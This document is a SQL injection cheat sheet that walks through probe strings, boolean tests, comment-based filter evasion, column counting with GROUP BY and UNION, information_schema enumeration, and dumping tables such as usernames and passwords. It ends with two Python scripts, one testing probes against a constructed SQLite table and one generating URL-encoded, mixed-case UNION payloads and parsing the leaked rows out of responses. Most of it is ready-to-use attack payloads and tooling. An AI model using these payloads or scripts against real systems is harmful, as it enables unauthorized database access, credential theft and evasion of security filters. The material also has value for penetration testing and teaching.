Identifying SQL Injection Vulnerability Parameters
Comments in SQL
-- MySQL comment; the second dash must be followed by at least one whitespace character
--+ The same comment as it appears in a URL: the "+" decodes to the required space
# Hash comment (MySQL only); URL-encode it as %23, otherwise the browser treats it as a fragment and it never reaches the server
--+- Another way to satisfy the trailing-whitespace rule ("-- -")
/**/ Inline C-style comment; usable in the middle of a statement and often survives where "--" and "#" are filtered
;%00 Null byte; some application layers stop reading the string at the NUL, so anything after it is hidden from a filter that runs there
` Backtick, the MySQL identifier quote; needed when the injection lands inside a backtick-quoted column or table name
To find out whether a parameter is injectable, send one probe at a time and compare each response with the baseline request: a database error, a changed number of results, or a different page layout all suggest the value reaches the query unescaped. The variants with closing brackets cover injections that land inside a parenthesised expression; the empty value shows how the application handles a missing parameter. Common probes:
id=[Nothing]
id='
id=''
id="
id=`
id=')
id=")
id=`)
id='))
id="))
id=`))
Examples of SQL Injection Testing
Once a probe that breaks the query has been found, confirm with boolean payloads. An always-true condition should return the normal page (or more rows than the baseline) and an always-false one an empty or reduced page; if the two differ while neither shows an error, the parameter is still injectable, just blind. Use the quote style that produced the error in the previous step:
1 or 1=1 -- true
1' or 1=1 -- true
1" or 1=1 -- true
1 and 1=2 -- false
-- Example: id=1'OR+1=1+--+ (the plus signs are URL-encoded spaces; the final one supplies the whitespace the "--" comment needs)
Obfuscating SQL to evade detection mechanisms or keyword filters
Inline comments can replace the whitespace between tokens, so a filter that looks for "SELECT " or "UNION SELECT" with a space in it does not match, while the database strips the comments before parsing:
SELECT/**/*/**/FROM/**/users/**/WHERE/**/username/**/='admin';
Finding the Number of Columns
A UNION-based extraction only works when the injected SELECT returns exactly as many columns as the original query, so the count has to be found first. Both methods below rely on the database rejecting a column position that does not exist.
Method 1: Error-Based Approach (GROUP BY / ORDER BY)
GROUP BY n (ORDER BY n behaves the same way) refers to the n-th column of the result. Start with a list that is too long and shorten it until the error disappears, or grow it until the error appears; the largest n that still works is the column count. The injected text must follow a valid value for the parameter:
group by 1,2,3,4,5,6,7,8,9 --
-- Example: id=1+group+by+1,2,3,4,5,6,7,8,9+--+
Method 2: Union-Based Approach
UNION ALL SELECT with a growing list of literals only stops erroring (MySQL: "The used SELECT statements have a different number of columns") at the right count. Use a value that matches no row, such as id=-1, so the record the application normally shows does not hide the injected one, and note which of the numbers appear on the page: those are the columns you can read data through.
UNION ALL SELECT 1,2,3,4,5,6,7,8,9 --
-- Example: id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9+--+
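The probe-and-compare step and both column-counting methods above, as an added example that is not part of the original page: a Python script in which a constructed in-memory SQLite table stands in for the vulnerable application (SQLite is used only so the example runs offline; the payloads are the MySQL ones from the text). The function names vulnerable_lookup, classify_probes, count_columns_group_by and count_columns_union and the sample users table are chosen here.

```python
import sqlite3

# Constructed stand-in for the vulnerable application: an in-memory SQLite
# table with three columns and a query assembled by string concatenation.
# SQLite stands in only so the example runs offline; the probes are the
# same ones the text sends to a MySQL-backed page.
SCHEMA = """
CREATE TABLE users (id INTEGER, username TEXT, email TEXT);
INSERT INTO users VALUES (1, 'admin', 'admin@example.test');
INSERT INTO users VALUES (2, 'bob',   'bob@example.test');
INSERT INTO users VALUES (3, 'carol', 'carol@example.test');
"""


def vulnerable_lookup(param):
    """The injectable query: the `id` parameter is pasted into the SQL text.

    Returns ("ok", rows) or ("error", message), which is what a tester sees
    as a normal page versus a database error page.
    """
    conn = sqlite3.connect(":memory:")
    try:
        conn.executescript(SCHEMA)
        sql = "SELECT id, username, email FROM users WHERE id = " + param
        return ("ok", conn.execute(sql).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


def classify_probes(baseline="1",
                    probes=("'", "1 or 1=1 -- ", "1 and 1=2 -- ")):
    """Send each probe and compare it with the baseline response.

    'error'      the input broke the query (unbalanced quote or bracket)
    'more rows'  an always-true condition widened the result set
    'fewer rows' an always-false condition shrank it
    'same'       nothing visible changed (could still be blind)
    """
    base_status, base_rows = vulnerable_lookup(baseline)
    if base_status != "ok":
        raise RuntimeError("baseline request must succeed: " + base_rows)
    verdicts = {}
    for probe in probes:
        status, rows = vulnerable_lookup(probe)
        if status == "error":
            verdicts[probe] = "error"
        elif len(rows) > len(base_rows):
            verdicts[probe] = "more rows"
        elif len(rows) < len(base_rows):
            verdicts[probe] = "fewer rows"
        else:
            verdicts[probe] = "same"
    return verdicts


def count_columns_group_by(max_cols=20):
    """Error-based: GROUP BY n names the n-th result column, so the first
    n that errors is one past the column count."""
    for n in range(1, max_cols + 1):
        positions = ",".join(str(i) for i in range(1, n + 1))
        status, _ = vulnerable_lookup("1 group by " + positions + " -- ")
        if status == "error":
            return n - 1
    return None


def count_columns_union(max_cols=20):
    """Union-based: UNION ALL SELECT 1,...,n only parses when n matches."""
    for n in range(1, max_cols + 1):
        values = ",".join(str(i) for i in range(1, n + 1))
        status, _ = vulnerable_lookup("1 UNION ALL SELECT " + values + " -- ")
        if status == "ok":
            return n
    return None


if __name__ == "__main__":
    print(classify_probes())
    print(count_columns_group_by(), count_columns_union())
```

Against a real target, vulnerable_lookup becomes an HTTP request and the "error" versus row-count verdict becomes a comparison of status code, response length or an error string, but the loop logic is the same.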
Retrieving Schema, Table and Column Names
Once the column count and a displayed column are known, the same UNION can read information_schema, MySQL's catalogue. GROUP_CONCAT packs every row of the result into one value, so a page that shows a single record still leaks the whole list; 0x7c is the hex literal for "|" and marks the start and end of each value without needing a quote character, which may be filtered. In every example below, prefix the payload with the injectable value and quote style found earlier (for example id=-1 or id=-1') and put GROUP_CONCAT in the column that the page displays.
Listing databases (schemas)
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata --
-- Example: UniOn+Select+gRoUp_cOncaT(0x7c,schema_name,0x7c),2,3,4+fRoM+information_schema.schemata+--+
-- This example assumes 4 columns, with column 1 displayed on the page
Listing the tables of a database
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7c)+fRoM+information_schema.tables+wHeRe+table_schema=...+--
-- Example: UniOn+Select+gRoUp_cOncaT(0x7c,table_name,0x7c),2,3,4+fRoM+information_schema.tables+wHeRe+table_schema='school'+--+
Listing the columns of a table
Suppose the previous step shows that school contains the tables users and accounting. To list the columns of users:
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7c)+fRoM+information_schema.columns+wHeRe+table_name=...+--
-- Example: UniOn+Select+gRoUp_cOncaT(0x7c,column_name,0x7c),2,3,4+fRoM+information_schema.columns+wHeRe+table_schema='school'+AND+table_name='users'+--+
-- Filter on table_schema as well as table_name: the same table name can exist in several databases, and the columns of all of them would otherwise be merged into one list.
This is the same information DESCRIBE school.users would return with direct database access.
Dumping Table Contents
With the database, table and column names known, select the columns themselves from {DB_name}.{table_name}. Several columns can be packed into each value with a separator such as ':'; pick one that does not occur in the data, or wrap the values in HEX() so they can be split reliably. GROUP_CONCAT output is cut off at group_concat_max_len (1024 bytes by default), so a large table has to be read in slices (a LIMIT inside a subquery, or one row at a time with LIMIT n,1).
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7c)+fRoM+{DB_name}.{table_name}+--
-- Example: UniOn+Select+gRoUp_cOncaT(0x7c,username,':',password,0x7c),2,3,4+fRoM+school.users+--+
If DB_name = mango, Table_name = messages and the columns are id, user_from, user_to and message_content, the content is dumped with:
UniOn+Select+gRoUp_cOncaT(0x7c,id,':',user_from,':',user_to,':',message_content,0x7c),2,3,4+fRoM+mango.messages+--+
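Added example, not code from the original page, that generates the information_schema and dump payloads above for any column count and displayed column, URL-encodes them the way the page's "--+" examples are written, and parses the |...| cells back out of a response body. It only builds strings and does not talk to a database; the function names (mixed_case, union_payload, dump_payload, parse_group_concat and the rest) and the sample response body are constructed for this example.

```python
import re
from urllib.parse import quote_plus

# MySQL hex literal for '|'. In string context MySQL treats 0x7c as the
# byte string "|", so it delimits values without needing a quote character.
PIPE = "0x7c"


def mixed_case(word):
    """Alternate the case of SQL keywords (uNiOn, gRoUp_cOnCaT) as the
    page's payloads do; this beats only case-sensitive keyword filters."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(word))


def union_payload(expr, n_cols, visible_col, source, where=None):
    """Build `UNION SELECT ... FROM source [WHERE ...] -- `.

    GROUP_CONCAT(0x7c, expr, 0x7c) goes into `visible_col`, the result column
    the page actually displays (1-based); the others are filled with numbers.
    """
    if not 1 <= visible_col <= n_cols:
        raise ValueError("visible column must be between 1 and n_cols")
    cols = [str(i) for i in range(1, n_cols + 1)]
    cols[visible_col - 1] = f"{mixed_case('group_concat')}({PIPE},{expr},{PIPE})"
    sql = (f"{mixed_case('union')} {mixed_case('select')} {','.join(cols)} "
           f"{mixed_case('from')} {source}")
    if where:
        sql += f" {mixed_case('where')} {where}"
    return sql + " -- "


def schemata_payload(n_cols, visible_col):
    return union_payload("schema_name", n_cols, visible_col,
                         "information_schema.schemata")


def tables_payload(n_cols, visible_col, schema):
    return union_payload("table_name", n_cols, visible_col,
                         "information_schema.tables",
                         f"table_schema='{schema}'")


def columns_payload(n_cols, visible_col, schema, table):
    # Filter on the schema too: the same table name can exist in several
    # databases, and a table_name-only filter would merge their columns.
    return union_payload("column_name", n_cols, visible_col,
                         "information_schema.columns",
                         f"table_schema='{schema}' AND table_name='{table}'")


def dump_payload(n_cols, visible_col, schema, table, columns):
    """One record per |...| cell, its fields joined with ':'."""
    return union_payload(",':',".join(columns), n_cols, visible_col,
                         f"{schema}.{table}")


def to_query_string(prefix, payload):
    """URL-encode for a GET parameter: spaces become '+', which is why the
    page writes --+; a '#' comment would have to be sent as %23 instead."""
    return quote_plus(prefix + payload, safe="'(),=:.*/-")


_CELL = re.compile(r"\|([^|]*)\|")


def parse_group_concat(body):
    """Pull every |...| cell out of a response body and split it on ':'.

    Values containing '|' or ':' would confuse this; wrap them in HEX() in
    the payload if that happens. MySQL also truncates GROUP_CONCAT output at
    group_concat_max_len (1024 bytes by default), so a missing tail means
    the table must be read in slices.
    """
    return [cell.split(":") for cell in _CELL.findall(body)]


if __name__ == "__main__":
    print(to_query_string("-1 ", schemata_payload(4, 1)))
    print(to_query_string("-1 ", dump_payload(4, 1, "mango", "messages",
          ["id", "user_from", "user_to", "message_content"])))
    # Constructed response body, as if the page echoed the displayed column:
    print(parse_group_concat("<td>|1:alice:bob:hi|,|2:bob:alice:yo|</td>"))
```

The prefix passed to to_query_string is whatever closed the original expression in the detection step (for example "-1 " or "-1' "); the payload itself does not change.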
